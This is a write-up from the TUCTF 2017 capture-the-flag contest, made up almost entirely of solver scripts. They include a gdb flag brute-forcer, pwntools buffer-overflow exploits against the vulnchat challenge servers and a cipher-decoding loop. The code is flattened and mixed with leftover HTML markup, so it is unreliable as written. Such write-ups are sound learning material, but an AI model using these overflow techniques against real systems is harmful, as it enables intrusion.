TUCTF 2017 - Write up :: /home/rhama/

gdb.execute("b *0x0000000000401c82")

while True: for c in char_set: pattern = flag + c + "A" * (55-len(flag)) gdb.execute("r {}“.format(pattern)) for i in range(len(flag)): gdb.execute("c") rax = gdb.execute("p/x $rax",True,True).split()[-1] if rax == "0x0": flag += c if ”}“ in flag: print("Flag : %s" % (flag)) exit(0) print("Curret Flag : %s" % (flag)) sleep(1) break print("Pattern : %s" % (pattern)) print("Nilai Rax : %s" % (rax))

vuln = remote("vulnchat.tuCTF.com",4141) payload = "A" 20 + p32(0x00007325) # overwrite with “%s" vuln.sendlineafter("Enter your username: “,payload) payload2 = "A" 49 + p32(0x804856b) vuln.sendlineafter(”: “,payload2) print vuln.recvall()

flag = "\x72" vuln2 = remote("vulnchat2.tuCTF.com", 4242) vuln2.sendlineafter("Enter your username: “,"AAAA") vuln2.recvuntil("AAAA: “) payload = "A" * 43 + flag vuln2.send(payload) print vuln2.recv(1024)

never = remote("neverending.tuCTF.com",12345) char_set = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~</span>s"

def round1(char="A"): never.sendlineafter("text:“,char) enc_base = never.recvline().split("is “)[1] enc_msg = never.recvline().split("is “)[1] enc_msg = enc_msg.split(” decrypted?\n")[0] log.info("ENC BASE : -> {}“.format(enc_base)) log.info("ENC MSG : -> {}“.format(enc_msg)) cal = ord(char) - ord(enc_base[0]) dec = "“.join([chr(ord(b) + cal) for b in enc_msg])

<span class="n">non_printable</span> <span class="o">=</span> <span class="p">[</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">))</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">dec</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">]</span>
<span class="n">printable</span> <span class="o">=</span> <span class="s">""</span><span class="o">.</span><span class="n">join</span><span class="p">([</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">)</span><span class="o">+</span><span class="mi">95</span><span class="p">)</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">non_printable</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">])</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">printable</span><span class="p">)):</span>
    <span class="n">dec</span> <span class="o">=</span> <span class="n">dec</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">non_printable</span><span class="p">[</span><span class="n">i</span><span class="p">],</span><span class="n">printable</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>

<span class="n">non_printable2</span> <span class="o">=</span> <span class="p">[</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">))</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">dec</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">]</span>
<span class="n">printable2</span> <span class="o">=</span> <span class="s">""</span><span class="o">.</span><span class="n">join</span><span class="p">([</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">z</span><span class="p">)</span><span class="o">-</span><span class="mi">190</span><span class="p">)</span> <span class="k">for</span> <span class="n">z</span> <span class="ow">in</span> <span class="n">non_printable2</span> <span class="k">if</span> <span class="n">z</span> <span class="ow">not</span> <span class="ow">in</span> <span class="n">char_set</span><span class="p">])</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">printable2</span><span class="p">)):</span>
    <span class="n">dec</span> <span class="o">=</span> <span class="n">dec</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="n">non_printable2</span><span class="p">[</span><span class="n">i</span><span class="p">],</span><span class="n">printable2</span><span class="p">[</span><span class="n">i</span><span class="p">])</span>

<span class="n">log</span><span class="o">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Decrypted -&gt; {}"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="nb">repr</span><span class="p">(</span><span class="n">dec</span><span class="p">)))</span>
<span class="n">never</span><span class="o">.</span><span class="n">sendlineafter</span><span class="p">(</span><span class="s">":"</span><span class="p">,</span><span class="n">dec</span><span class="p">)</span>

for i in range(100): try: log.info("Round {0}“.format(i)) round1() if never.recvline().split()[0] == "Correct!“: log.info(”-> BENAR") continue log.info(”-> SALAH") except: print never.recv() never.close() break